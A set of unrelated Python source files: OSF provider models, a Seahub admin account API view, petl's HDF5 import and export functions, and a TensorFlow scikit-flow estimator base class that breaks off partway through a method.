        return 'registration'
    def get_absolute_url(self):
        return self.absolute_api_v2_url
    @property
    def absolute_api_v2_url(self):
        # API v2 detail endpoint for this provider.
        path = '/providers/registrations/{}/'.format(self._id)
        return api_v2_url(path)
class PreprintProvider(AbstractProvider):
    """Provider that brands and hosts preprint services, including the
    configuration used when pushing publications to SHARE."""
    PUSH_SHARE_TYPE_CHOICES = (('Preprint', 'Preprint'),
                               ('Thesis', 'Thesis'),)
    PUSH_SHARE_TYPE_HELP = 'This SHARE type will be used when pushing publications to SHARE'
    REVIEWABLE_RELATION_NAME = 'preprint_services'
    share_publish_type = models.CharField(choices=PUSH_SHARE_TYPE_CHOICES,
                                          default='Preprint',
                                          help_text=PUSH_SHARE_TYPE_HELP,
                                          max_length=32)
    share_source = models.CharField(blank=True, max_length=200)
    share_title = models.TextField(default='', blank=True)
    additional_providers = fields.ArrayField(models.CharField(max_length=200), default=list, blank=True)
    access_token = EncryptedTextField(null=True, blank=True)
    doi_prefix = models.CharField(blank=True, max_length=32)
    PREPRINT_WORD_CHOICES = (
        ('preprint', 'Preprint'),
        ('paper', 'Paper'),
        ('thesis', 'Thesis'),
        ('work', 'Work'),
        ('none', 'None')
    )
    preprint_word = models.CharField(max_length=10, choices=PREPRINT_WORD_CHOICES, default='preprint')
    # Legacy subject rules; presumably a list of
    # ([subject-id hierarchy], include_children) pairs (see rules_to_subjects).
    subjects_acceptable = DateTimeAwareJSONField(blank=True, default=list)
    class Meta:
        permissions = (
            # custom permissions for use in the OSF Admin App
            ('view_preprintprovider', 'Can view preprint provider details'),
        )
    @property
    def readable_type(self):
        # Human-readable label used in logs and messages.
        return 'preprint'
    @property
    def all_subjects(self):
        if self.subjects.exists():
            return self.subjects.all()
        else:
            # TODO: Delete this when all PreprintProviders have a mapping
            return rules_to_subjects(self.subjects_acceptable)
    @property
    def has_highlighted_subjects(self):
        return self.subjects.filter(highlighted=True).exists()
    @property
    def highlighted_subjects(self):
        # Up to 10 subjects, alphabetical by text; falls back to top-level
        # subjects when none are explicitly highlighted.
        if self.has_highlighted_subjects:
            return self.subjects.filter(highlighted=True).order_by('text')[:10]
        else:
            return sorted(self.top_level_subjects, key=lambda s: s.text)[:10]
    @property
    def top_level_subjects(self):
        if self.subjects.exists():
            return optimize_subject_query(self.subjects.filter(parent__isnull=True))
        else:
            # TODO: Delete this when all PreprintProviders have a mapping
            if len(self.subjects_acceptable) == 0:
                return optimize_subject_query(Subject.objects.filter(parent__isnull=True, provider___id='osf'))
            # The first element of each rule's hierarchy is its top-level subject.
            tops = set([sub[0][0] for sub in self.subjects_acceptable])
            return [Subject.load(sub) for sub in tops]
    @property
    def landing_url(self):
        # A custom domain wins; otherwise the OSF preprints path.
        return self.domain if self.domain else '{}preprints/{}'.format(settings.DOMAIN, self._id)
    def get_absolute_url(self):
        return '{}preprint_providers/{}'.format(self.absolute_api_v2_url, self._id)
    @property
    def absolute_api_v2_url(self):
        # API v2 detail endpoint for this provider.
        path = '/providers/preprints/{}/'.format(self._id)
        return api_v2_url(path)
def rules_to_subjects(rules):
    """Translate legacy subject-acceptance rules into a Subject queryset.

    Each rule is a pair whose first element is a subject-id hierarchy and
    whose second is a flag meaning "include children".  With no rules (or no
    usable clauses) the OSF-wide preprint-provider subjects are returned.
    """
    osf_defaults = Subject.objects.filter(
        provider___id='osf', provider__type='osf.preprintprovider')
    if not rules:
        return osf_defaults
    clauses = []
    for rule in rules:
        hierarchy, include_children = rule[0], rule[1]
        leaf = Subject.load(hierarchy[-1])
        if include_children:
            clauses.append(models.Q(parent=leaf))
            if len(hierarchy) == 1:
                # Top-level rule: include grandchildren as well.
                for child in Subject.objects.filter(parent=leaf):
                    clauses.append(models.Q(parent=child))
        # Always include the subjects named in the hierarchy itself.
        for subject_id in hierarchy:
            clauses.append(models.Q(_id=subject_id))
    if not clauses:
        return osf_defaults
    if len(clauses) == 1:
        return Subject.objects.filter(clauses[0])
    return Subject.objects.filter(reduce(lambda lhs, rhs: lhs | rhs, clauses))
@receiver(post_save, sender=PreprintProvider)
def create_provider_auth_groups(sender, instance, created, **kwargs):
    """On first save of a PreprintProvider, set up its permission groups."""
    if not created:
        return
    instance.update_group_permissions()
@receiver(post_save, sender=PreprintProvider)
def create_provider_notification_subscriptions(sender, instance, created, **kwargs):
    """Ensure a 'new pending submissions' subscription exists for a new provider."""
    if not created:
        return
    NotificationSubscription.objects.get_or_create(
        _id='{provider_id}_new_pending_submissions'.format(provider_id=instance._id),
        event_name='new_pending_submissions',
        provider=instance,
    )
@receiver(post_save, sender=CollectionProvider)
@receiver(post_save, sender=RegistrationProvider)
def create_primary_collection_for_provider(sender, instance, created, **kwargs):
    """Give every new collection/registration provider a promoted, public
    primary collection owned by the admin who created the provider."""
    if not created:
        return
    Collection = apps.get_model('osf.Collection')
    user = getattr(instance, '_creator', None)  # Temp attr set in admin view
    if not user:
        # A user is required for Collections / Groups
        sentry.log_message('Unable to create primary_collection for {}Provider {}'.format(instance.readable_type.capitalize(), instance.name))
        return
    collection = Collection(
        title='{}\'s Collection'.format(instance.name),
        creator=user,
        provider=instance,
        is_promoted=True,
        is_public=True,
    )
    collection.save()
    instance.primary_collection = collection
    instance.save()
class WhitelistedSHAREPreprintProvider(BaseModel):
    """Names of external preprint providers approved for SHARE ingestion."""
    id = models.AutoField(primary_key=True)
    provider_name = models.CharField(unique=True, max_length=200)
    def __unicode__(self):
        return self.provider_name
class AbstractProviderUserObjectPermission(UserObjectPermissionBase):
    # django-guardian direct-FK table for per-user provider permissions.
    content_object = models.ForeignKey(AbstractProvider, on_delete=models.CASCADE)
class AbstractProviderGroupObjectPermission(GroupObjectPermissionBase):
    # django-guardian direct-FK table for per-group provider permissions.
    content_object = models.ForeignKey(AbstractProvider, on_delete=models.CASCADE)
| |
import logging
from dateutil.relativedelta import relativedelta
from django.utils import timezone
from rest_framework import status
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAdminUser
from rest_framework.response import Response
from rest_framework.reverse import reverse
from rest_framework.views import APIView
import seaserv
from seaserv import seafile_api, ccnet_threaded_rpc
from pysearpc import SearpcError
from seahub.api2.authentication import TokenAuthentication
from seahub.api2.serializers import AccountSerializer
from seahub.api2.throttling import UserRateThrottle
from seahub.api2.utils import api_error, to_python_boolean
from seahub.api2.status import HTTP_520_OPERATION_FAILED
from seahub.base.accounts import User
from seahub.profile.models import Profile
from seahub.profile.utils import refresh_cache as refresh_profile_cache
from seahub.utils import is_valid_username
logger = logging.getLogger(__name__)
json_content_type = 'application/json; charset=utf-8'
class Account(APIView):
    """Query/Add/Delete a specific account.
    Administrator permission is required.
    """
    authentication_classes = (TokenAuthentication, SessionAuthentication)
    permission_classes = (IsAdminUser, )
    throttle_classes = (UserRateThrottle, )

    def get(self, request, email, format=None):
        """Return account info (flags, creation time, quota, usage) for ``email``."""
        if not is_valid_username(email):
            return api_error(status.HTTP_400_BAD_REQUEST, 'Email %s invalid.' % email)
        # query account info
        try:
            user = User.objects.get(email=email)
        except User.DoesNotExist:
            return api_error(status.HTTP_404_NOT_FOUND, 'User %s not found.' % email)
        info = {}
        info['email'] = user.email
        info['id'] = user.id
        info['is_staff'] = user.is_staff
        info['is_active'] = user.is_active
        info['create_time'] = user.ctime
        info['total'] = seafile_api.get_user_quota(email)
        info['usage'] = seafile_api.get_user_self_usage(email)
        return Response(info)

    def _update_account_profile(self, request, email):
        """Update nickname/intro from request data; no-op when neither is given."""
        name = request.data.get("name", None)
        note = request.data.get("note", None)
        if name is None and note is None:
            return
        profile = Profile.objects.get_profile_by_user(email)
        if profile is None:
            profile = Profile(user=email)
        if name is not None:
            # if '/' in name:
            #     return api_error(status.HTTP_400_BAD_REQUEST, "Nickname should not include '/'")
            profile.nickname = name
        if note is not None:
            profile.intro = note
        profile.save()

    def _update_account_quota(self, request, email):
        """Set the storage quota from request data; share quota is disabled."""
        storage = request.data.get("storage", None)
        sharing = request.data.get("sharing", None)
        if storage is None and sharing is None:
            return
        if storage is not None:
            seafile_api.set_user_quota(email, int(storage))
        # if sharing is not None:
        #     seafile_api.set_user_share_quota(email, int(sharing))

    def _create_account(self, request, email):
        """Create a new user from serialized request data; 201 on success."""
        copy = request.data.copy()
        copy['email'] = email
        serializer = AccountSerializer(data=copy)
        if serializer.is_valid():
            try:
                user = User.objects.create_user(serializer.data['email'],
                                                serializer.data['password'],
                                                serializer.data['is_staff'],
                                                serializer.data['is_active'])
            except User.DoesNotExist as e:
                logger.error(e)
                return api_error(status.HTTP_520_OPERATION_FAILED,
                                 'Failed to add user.')
            self._update_account_profile(request, user.username)
            resp = Response('success', status=status.HTTP_201_CREATED)
            resp['Location'] = reverse('api2-account', args=[email])
            return resp
        else:
            return api_error(status.HTTP_400_BAD_REQUEST, serializer.errors)

    def _update_account(self, request, user):
        """Update password, staff/active flags, quota, and trial status of
        an existing user; returns an api_error response on the first failure."""
        password = request.data.get("password", None)
        is_staff = request.data.get("is_staff", None)
        if is_staff is not None:
            try:
                is_staff = to_python_boolean(is_staff)
            except ValueError:
                return api_error(status.HTTP_400_BAD_REQUEST,
                                 'is_staff invalid.')
        is_active = request.data.get("is_active", None)
        if is_active is not None:
            try:
                is_active = to_python_boolean(is_active)
            except ValueError:
                return api_error(status.HTTP_400_BAD_REQUEST,
                                 'is_active invalid.')
        if password is not None:
            user.set_password(password)
        if is_staff is not None:
            user.is_staff = is_staff
        if is_active is not None:
            user.is_active = is_active
        result_code = user.save()
        if result_code == -1:
            return api_error(status.HTTP_520_OPERATION_FAILED,
                             'Failed to update user.')
        self._update_account_profile(request, user.username)
        try:
            self._update_account_quota(request, user.username)
        except SearpcError as e:
            logger.error(e)
            return api_error(HTTP_520_OPERATION_FAILED, 'Failed to set user quota.')
        is_trial = request.data.get("is_trial", None)
        if is_trial is not None:
            try:
                # Trial accounts are an optional pro-edition feature.
                from seahub_extra.trialaccount.models import TrialAccount
            except ImportError:
                pass
            else:
                try:
                    is_trial = to_python_boolean(is_trial)
                except ValueError:
                    return api_error(status.HTTP_400_BAD_REQUEST,
                                     'is_trial invalid')
                if is_trial is True:
                    expire_date = timezone.now() + relativedelta(days=7)
                    # Bug fix: the Django manager is `objects`, not `object`
                    # (the previous `TrialAccount.object` raised AttributeError).
                    TrialAccount.objects.create_or_update(user.username,
                                                          expire_date)
                else:
                    TrialAccount.objects.filter(user_or_org=user.username).delete()
        return Response('success')

    def post(self, request, email, format=None):
        """Migrate an account's repos and groups to an existing account.

        Only ``op=migrate`` is supported; ``to_user`` names the target account.
        """
        if not is_valid_username(email):
            return api_error(status.HTTP_400_BAD_REQUEST, 'Email %s invalid.' % email)
        op = request.data.get('op', '').lower()
        if op == 'migrate':
            from_user = email
            to_user = request.data.get('to_user', '')
            if not is_valid_username(to_user):
                return api_error(status.HTTP_400_BAD_REQUEST, 'Email %s invalid.' % to_user)
            try:
                user2 = User.objects.get(email=to_user)
            except User.DoesNotExist:
                return api_error(status.HTTP_404_NOT_FOUND, 'User %s not found.' % to_user)
            # transfer owned repos to new user
            for r in seafile_api.get_owned_repo_list(from_user):
                seafile_api.set_repo_owner(r.id, user2.username)
            # transfer joined groups to new user
            for g in seaserv.get_personal_groups_by_user(from_user):
                if not seaserv.is_group_user(g.id, user2.username):
                    # add new user to the group on behalf of the group creator
                    ccnet_threaded_rpc.group_add_member(g.id, g.creator_name,
                                                        to_user)
                if from_user == g.creator_name:
                    ccnet_threaded_rpc.set_group_creator(g.id, to_user)
            return Response("success")
        else:
            return api_error(status.HTTP_400_BAD_REQUEST, 'op can only be migrate.')

    def put(self, request, email, format=None):
        """Update the account if it exists; otherwise create it (upsert)."""
        if not is_valid_username(email):
            return api_error(status.HTTP_400_BAD_REQUEST, 'Email %s invalid.' % email)
        try:
            user = User.objects.get(email=email)
            return self._update_account(request, user)
        except User.DoesNotExist:
            return self._create_account(request, email)

    def delete(self, request, email, format=None):
        """Delete the account; deleting a missing account still succeeds (202)."""
        if not is_valid_username(email):
            return api_error(status.HTTP_400_BAD_REQUEST, 'Email %s invalid.' % email)
        # delete account
        try:
            user = User.objects.get(email=email)
            user.delete()
            return Response("success")
        except User.DoesNotExist:
            resp = Response("success", status=status.HTTP_202_ACCEPTED)
            return resp
| |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, division
from contextlib import contextmanager
from petl.compat import string_types
from petl.errors import ArgumentError
from petl.util.base import Table, iterpeek, data
from petl.io.numpy import infer_dtype
def fromhdf5(source, where=None, name=None, condition=None,
             condvars=None, start=None, stop=None, step=None):
    """
    Provides access to an HDF5 table. E.g.::

        >>> import petl as etl
        >>> import tables
        >>> # set up a new hdf5 table to demonstrate with
        ... h5file = tables.open_file('example.h5', mode='w',
        ...                           title='Example file')
        >>> h5file.create_group('/', 'testgroup', 'Test Group')
        /testgroup (Group) 'Test Group'
          children := []
        >>> class FooBar(tables.IsDescription):
        ...     foo = tables.Int32Col(pos=0)
        ...     bar = tables.StringCol(6, pos=2)
        ...
        >>> h5table = h5file.create_table('/testgroup', 'testtable', FooBar,
        ...                               'Test Table')
        >>> # load some data into the table
        ... table1 = (('foo', 'bar'),
        ...           (1, b'asdfgh'),
        ...           (2, b'qwerty'),
        ...           (3, b'zxcvbn'))
        >>> for row in table1[1:]:
        ...     for i, f in enumerate(table1[0]):
        ...         h5table.row[f] = row[i]
        ...     h5table.row.append()
        ...
        >>> h5file.flush()
        >>> h5file.close()
        >>> #
        ... # now demonstrate use of fromhdf5
        ... table1 = etl.fromhdf5('example.h5', '/testgroup', 'testtable')
        >>> table1
        +-----+-----------+
        | foo | bar       |
        +=====+===========+
        |   1 | b'asdfgh' |
        +-----+-----------+
        |   2 | b'qwerty' |
        +-----+-----------+
        |   3 | b'zxcvbn' |
        +-----+-----------+

        >>> # alternatively just specify path to table node
        ... table1 = etl.fromhdf5('example.h5', '/testgroup/testtable')
        >>> # ...or use an existing tables.File object
        ... h5file = tables.open_file('example.h5')
        >>> table1 = etl.fromhdf5(h5file, '/testgroup/testtable')
        >>> # ...or use an existing tables.Table object
        ... h5tbl = h5file.get_node('/testgroup/testtable')
        >>> table1 = etl.fromhdf5(h5tbl)
        >>> # use a condition to filter data
        ... table2 = etl.fromhdf5(h5tbl, condition='foo < 3')
        >>> table2
        +-----+-----------+
        | foo | bar       |
        +=====+===========+
        |   1 | b'asdfgh' |
        +-----+-----------+
        |   2 | b'qwerty' |
        +-----+-----------+

        >>> h5file.close()

    The `source` argument may be a file name, an open `tables.File`, or a
    `tables.Table` node. `condition` and `condvars` are passed through to
    PyTables to filter rows; `start`, `stop` and `step` select a row slice.
    The returned view reads rows lazily on iteration.
    """
    return HDF5View(source, where=where, name=name,
                    condition=condition, condvars=condvars,
                    start=start, stop=stop, step=step)
class HDF5View(Table):
    """Lazy table view over a PyTables HDF5 table; see :func:`fromhdf5`."""
    def __init__(self, source, where=None, name=None, condition=None,
                 condvars=None, start=None, stop=None, step=None):
        self.source = source
        self.where = where
        self.name = name
        self.condition = condition
        self.condvars = condvars
        self.start = start
        self.stop = stop
        self.step = step
    def __iter__(self):
        # Delegate to iterhdf5, which opens/closes the file as needed.
        return iterhdf5(self.source, self.where, self.name, self.condition,
                        self.condvars, self.start, self.stop, self.step)
@contextmanager
def _get_hdf5_table(source, where, name, mode='r'):
    """Yield a ``tables.Table`` for *source*, closing the underlying file on
    exit only if this function opened it."""
    import tables
    close_on_exit = False
    h5file = None
    if isinstance(source, tables.Table):
        # already a table node - use it directly
        tbl = source
    elif isinstance(source, string_types):
        # treat source as the name of an HDF5 file and open it ourselves
        h5file = tables.open_file(source, mode=mode)
        close_on_exit = True
        tbl = h5file.get_node(where, name=name)
    elif isinstance(source, tables.File):
        # caller supplied an open file object; do not close it
        h5file = source
        tbl = h5file.get_node(where, name=name)
    else:
        raise ArgumentError('invalid source argument, expected file name or '
                            'tables.File or tables.Table object, found: %r'
                            % source)
    try:
        yield tbl
    finally:
        if close_on_exit:
            h5file.close()
@contextmanager
def _get_hdf5_file(source, mode='r'):
    """Yield a ``tables.File`` for *source*, closing it on exit only if this
    function opened it."""
    import tables
    close_on_exit = False
    if isinstance(source, string_types):
        # treat source as the name of an HDF5 file and open it ourselves
        h5file = tables.open_file(source, mode=mode)
        close_on_exit = True
    elif isinstance(source, tables.File):
        # caller supplied an open file object; do not close it
        h5file = source
    else:
        raise ArgumentError('invalid source argument, expected file name or '
                            'tables.File object, found: %r' % source)
    try:
        yield h5file
    finally:
        if close_on_exit:
            h5file.close()
def iterhdf5(source, where, name, condition, condvars, start, stop, step):
    """Generate rows (header first) from an HDF5 table, optionally filtered."""
    with _get_hdf5_table(source, where, name) as tbl:
        # header row
        yield tuple(tbl.colnames)
        if condition is None:
            rows = tbl.iterrows(start=start, stop=stop, step=step)
        else:
            # push filtering down into PyTables
            rows = tbl.where(condition, condvars=condvars,
                             start=start, stop=stop, step=step)
        for row in rows:
            yield row[:]  # materialise each row as a tuple
def fromhdf5sorted(source, where=None, name=None, sortby=None, checkCSI=False,
                   start=None, stop=None, step=None):
    """
    Provides access to an HDF5 table, sorted by an indexed column, e.g.::

        >>> import petl as etl
        >>> import tables
        >>> # set up a new hdf5 table to demonstrate with
        ... h5file = tables.open_file('example.h5', mode='w', title='Test file')
        >>> h5file.create_group('/', 'testgroup', 'Test Group')
        /testgroup (Group) 'Test Group'
          children := []
        >>> class FooBar(tables.IsDescription):
        ...     foo = tables.Int32Col(pos=0)
        ...     bar = tables.StringCol(6, pos=2)
        ...
        >>> h5table = h5file.create_table('/testgroup', 'testtable', FooBar, 'Test Table')
        >>> # load some data into the table
        ... table1 = (('foo', 'bar'),
        ...           (3, b'asdfgh'),
        ...           (2, b'qwerty'),
        ...           (1, b'zxcvbn'))
        >>> for row in table1[1:]:
        ...     for i, f in enumerate(table1[0]):
        ...         h5table.row[f] = row[i]
        ...     h5table.row.append()
        ...
        >>> h5table.cols.foo.create_csindex()  # CS index is required
        0
        >>> h5file.flush()
        >>> h5file.close()
        >>> #
        ... # access the data, sorted by the indexed column
        ... table2 = etl.fromhdf5sorted('example.h5', '/testgroup', 'testtable',
        ...                             sortby='foo')
        >>> table2
        +-----+-----------+
        | foo | bar       |
        +=====+===========+
        |   1 | b'zxcvbn' |
        +-----+-----------+
        |   2 | b'qwerty' |
        +-----+-----------+
        |   3 | b'asdfgh' |
        +-----+-----------+

    Raises :class:`petl.errors.ArgumentError` if `sortby` is not given.
    """
    # Validate with a real exception rather than `assert`, which is stripped
    # when Python runs with -O; ArgumentError is petl's standard for bad args.
    if sortby is None:
        raise ArgumentError('no column specified to sort by')
    return HDF5SortedView(source, where=where, name=name,
                          sortby=sortby, checkCSI=checkCSI,
                          start=start, stop=stop, step=step)
class HDF5SortedView(Table):
    """Lazy table view over a PyTables HDF5 table, iterated in the order of a
    completely-sorted index; see :func:`fromhdf5sorted`."""
    def __init__(self, source, where=None, name=None, sortby=None,
                 checkCSI=False, start=None, stop=None, step=None):
        self.source = source
        self.where = where
        self.name = name
        self.sortby = sortby
        self.checkCSI = checkCSI
        self.start = start
        self.stop = stop
        self.step = step
    def __iter__(self):
        # Delegate to iterhdf5sorted, which opens/closes the file as needed.
        return iterhdf5sorted(self.source, self.where, self.name, self.sortby,
                              self.checkCSI, self.start, self.stop, self.step)
def iterhdf5sorted(source, where, name, sortby, checkCSI, start, stop, step):
    """Generate rows (header first) from an HDF5 table in index-sorted order."""
    with _get_hdf5_table(source, where, name) as tbl:
        # header row
        yield tuple(tbl.colnames)
        sorted_rows = tbl.itersorted(sortby, checkCSI=checkCSI, start=start,
                                     stop=stop, step=step)
        for row in sorted_rows:
            yield row[:]  # materialise each row as a tuple
def tohdf5(table, source, where=None, name=None, create=False, drop=False,
           description=None, title='', filters=None, expectedrows=10000,
           chunkshape=None, byteorder=None, createparents=False,
           sample=1000):
    """
    Write to an HDF5 table. If `create` is `False`, assumes the table
    already exists, and attempts to truncate it before loading. If `create`
    is `True`, a new table will be created, and if `drop` is True,
    any existing table will be dropped first. If `description` is `None`,
    the description will be guessed (from the first `sample` rows). E.g.::

        >>> import petl as etl
        >>> table1 = (('foo', 'bar'),
        ...           (1, b'asdfgh'),
        ...           (2, b'qwerty'),
        ...           (3, b'zxcvbn'))
        >>> etl.tohdf5(table1, 'example.h5', '/testgroup', 'testtable',
        ...            drop=True, create=True, createparents=True)
        >>> etl.fromhdf5('example.h5', '/testgroup', 'testtable')
        +-----+-----------+
        | foo | bar       |
        +=====+===========+
        |   1 | b'asdfgh' |
        +-----+-----------+
        |   2 | b'qwerty' |
        +-----+-----------+
        |   3 | b'zxcvbn' |
        +-----+-----------+

    """
    import tables
    it = iter(table)
    if create:
        # File is opened in append mode so other nodes are preserved.
        with _get_hdf5_file(source, mode='a') as h5file:
            if drop:
                try:
                    h5file.get_node(where, name)
                except tables.NoSuchNodeError:
                    pass
                else:
                    h5file.remove_node(where, name)
            # determine datatype
            if description is None:
                # peek at the first `sample` rows without consuming them
                peek, it = iterpeek(it, sample)
                # use a numpy dtype
                description = infer_dtype(peek)
            # create the table
            h5file.create_table(where, name, description,
                                title=title,
                                filters=filters,
                                expectedrows=expectedrows,
                                chunkshape=chunkshape,
                                byteorder=byteorder,
                                createparents=createparents)
    with _get_hdf5_table(source, where, name, mode='a') as h5table:
        # truncate the existing table
        h5table.truncate(0)
        # load the data
        _insert(it, h5table)
Table.tohdf5 = tohdf5
def appendhdf5(table, source, where=None, name=None):
    """
    As :func:`petl.io.hdf5.tohdf5` but don't truncate the target table before
    loading.
    """
    # Open in append mode; existing rows are kept and new rows added after.
    with _get_hdf5_table(source, where, name, mode='a') as h5table:
        # load the data
        _insert(table, h5table)
Table.appendhdf5 = appendhdf5
def _insert(table, h5table):
    """Append each data row of *table* to *h5table*, then flush."""
    for row in data(table):  # data() skips the header row
        for col_index, col_name in enumerate(h5table.colnames):
            # Positional mapping: input fields must be in the same order as
            # the HDF5 columns, though the field names need not match.
            h5table.row[col_name] = row[col_index]
        h5table.row.append()
    h5table.flush()
| |
"""Base estimator class."""
# Copyright 2015-present The Scikit Flow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import json
import os
import shutil
from six import string_types
import numpy as np
from google.protobuf import text_format
from tensorflow.python.platform import gfile
from tensorflow.python.client import session
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import importer
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops as array_ops_
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import variables
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.training import training as train
from tensorflow.contrib.layers import optimizers
from tensorflow.contrib.learn.python.learn.io.data_feeder import setup_train_data_feeder
from tensorflow.contrib.learn.python.learn.io.data_feeder import setup_predict_data_feeder
from tensorflow.contrib.learn.python.learn.ops.dropout_ops import DROPOUTS
from tensorflow.contrib.learn.python.learn import monitors as monitors_lib
from tensorflow.contrib.learn.python.learn.utils import checkpoints
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.contrib.learn.python.learn.estimators import _sklearn
from tensorflow.contrib.learn.python.learn.estimators._sklearn import NotFittedError
from tensorflow.contrib.learn.python.learn.estimators.run_config import RunConfig
def _write_with_backup(filename, content):
    """Write *content* to *filename*, first renaming any existing file to
    ``<filename>.old``."""
    if gfile.Exists(filename):
        backup_name = filename + '.old'
        gfile.Rename(filename, backup_name, overwrite=True)
    with gfile.Open(filename, 'w') as out_file:
        out_file.write(content)
def _copy_dir(dir_in, dir_out):
    """Recursively copy *dir_in* into *dir_out*, overwriting existing files."""
    gfile.MakeDirs(dir_out)
    for entry in gfile.ListDirectory(dir_in):
        src = os.path.join(dir_in, entry)
        dst = os.path.join(dir_out, entry)
        if gfile.IsDirectory(src):
            gfile.MakeDirs(dst)
            _copy_dir(src, dst)
        else:
            gfile.Copy(src, dst, overwrite=True)
def _new_tf_model_fn(model_fn, class_weight):
    """Backward compatibility way of adding class weight and IS_TRAINING.
    TODO(ipolosukhin): Remove this function after new layers are available.
    Specifically:
    * dropout and batch norm should work via update ops.
    * class weights should be retrieved from weights column or hparams.
    """
    def _model_fn(features, targets, mode):
        # Record whether this graph is being built for training so layers
        # (e.g. dropout) can look it up via the graph collection.
        ops.get_default_graph().add_to_collection('IS_TRAINING', mode == 'train')
        if class_weight is not None:
            # Expose class weights to the loss as a named constant in the graph.
            constant_op.constant(class_weight, name='class_weight')
        # Note: mode is deliberately not forwarded; the wrapped model_fn
        # takes only (features, targets).
        return model_fn(features, targets)
    return _model_fn
class TensorFlowEstimator(estimator.Estimator):
  """Base class for all TensorFlow estimators.

  Parameters:
    model_fn: Model function, that takes input X, y tensors and outputs
      prediction and loss tensors.
    n_classes: Number of classes in the target.
    batch_size: Mini batch size.
    steps: Number of steps to run over data.
    optimizer: Optimizer name (or class), for example "SGD", "Adam",
      "Adagrad".
    learning_rate: If this is constant float value, no decay function is used.
      Instead, a customized decay function can be passed that accepts
      global_step as parameter and returns a Tensor.
      e.g. exponential decay function:
      def exp_decay(global_step):
          return tf.train.exponential_decay(
              learning_rate=0.1, global_step,
              decay_steps=2, decay_rate=0.001)
    clip_gradients: Clip norm of the gradients to this value to stop
      gradient explosion.
    class_weight: None or list of n_classes floats. Weight associated with
      classes for loss computation. If not given, all classes are supposed to
      have weight one.
    continue_training: when continue_training is True, once initialized
      model will be continuely trained on every call of fit.
    config: RunConfig object that controls the configurations of the
      session, e.g. num_cores, gpu_memory_fraction, etc.
    verbose: Controls the verbosity, possible values:
      0: the algorithm and debug information is muted.
      1: trainer prints the progress.
      2: log device placement is printed.
  """

  def __init__(self,
               model_fn,
               n_classes,
               batch_size=32,
               steps=200,
               optimizer='Adagrad',
               learning_rate=0.1,
               clip_gradients=5.0,
               class_weight=None,
               continue_training=False,
               config=None,
               verbose=1):
    # n_classes > 1 selects classification mode; otherwise regression.
    super(TensorFlowEstimator, self).__init__(
        model_fn=_new_tf_model_fn(model_fn, class_weight),
        classification=n_classes > 1,
        learning_rate=learning_rate,
        optimizer=optimizer,
        clip_gradients=clip_gradients,
        config=config)
    self.n_classes = n_classes
    self.batch_size = batch_size
    self.steps = steps
    self.verbose = verbose
    self.continue_training = continue_training
    # Lazily created in fit(); holds the training data feeder.
    self._data_feeder = None

  def fit(self, x, y, steps=None, monitors=None, logdir=None):
    """Builds a neural network model given provided `model_fn` and training
    data X and y.

    Note: called first time constructs the graph and initializers
    variables. Consecutives times it will continue training the same model.
    This logic follows partial_fit() interface in scikit-learn.
    To restart learning, create new estimator.

    Args:
      x: matrix or tensor of shape [n_samples, n_features...]. Can be
        iterator that returns arrays of features. The training input
        samples for fitting the model.
      y: vector or matrix [n_samples] or [n_samples, n_outputs]. Can be
        iterator that returns array of targets. The training target values
        (class labels in classification, real numbers in regression).
      steps: int, number of steps to train.
        If None or 0, train for `self.steps`.
      monitors: List of `BaseMonitor` objects to print training progress and
        invoke early stopping.
      logdir: the directory to save the log file that can be used for
        optional visualization.

    Returns:
      Returns self.
    """
    if logdir is not None:
      self._model_dir = logdir
    self._data_feeder = setup_train_data_feeder(
        x, y, n_classes=self.n_classes, batch_size=self.batch_size)
    self._train_model(input_fn=self._data_feeder.input_builder,
                      feed_fn=self._data_feeder.get_feed_dict_fn(),
                      steps=steps or self.steps,
                      monitors=monitors)
    return self

  def evaluate(self, x=None, y=None, input_fn=None, steps=None):
    """See base class."""
    feed_fn = None
    if x is not None:
      # Feed the evaluation data exactly once (epochs=1).
      eval_data_feeder = setup_train_data_feeder(
          x, y, n_classes=self.n_classes, batch_size=self.batch_size, epochs=1)
      input_fn, feed_fn = (eval_data_feeder.input_builder,
                           eval_data_feeder.get_feed_dict_fn())
    return self._evaluate_model(
        input_fn=input_fn, feed_fn=feed_fn, steps=steps or self.steps)

  def partial_fit(self, x, y):
    """Incremental fit on a batch of samples.

    This method is expected to be called several times consecutively
    on different or the same chunks of the dataset. This either can
    implement iterative training or out-of-core/online training.
    This is especially useful when the whole dataset is too big to
    fit in memory at the same time. Or when model is taking long time
    to converge, and you want to split up training into subparts.

    Args:
      x: matrix or tensor of shape [n_samples, n_features...]. Can be
        iterator that returns arrays of features. The training input
        samples for fitting the model.
      y: vector or matrix [n_samples] or [n_samples, n_outputs]. Can be
        iterator that returns array of targets. The training target values
        (class label in classification, real numbers in regression).

    Returns:
      Returns self.
    """
    # Delegates to fit(), which already continues training an existing graph.
    return self.fit(x, y)

  def _predict(self, x, axis=-1, batch_size=None):
    # Shared inference helper used by predict() and predict_proba().
    if self._graph is None:
      raise NotFittedError()
    # Use the batch size for fitting if the user did not specify one.
    if batch_size is None:
      batch_size = self.batch_size
    predict_data_feeder = setup_train_data_feeder(
        x, None, n_classes=None,
        batch_size=batch_size,
        shuffle=False, epochs=1)
    preds = self._infer_model(
        input_fn=predict_data_feeder.input_builder,
        feed_fn=predict_data_feeder.get_feed_dict_fn())
    if self.n_classes > 1 and axis != -1:
      # Classification with an explicit axis: reduce probabilities to labels.
      preds = preds.argmax(axis=axis)
    else:
      # NOTE(review): intentional no-op branch — raw model output is returned
      # unchanged for regression or when axis == -1 (predict_proba path).
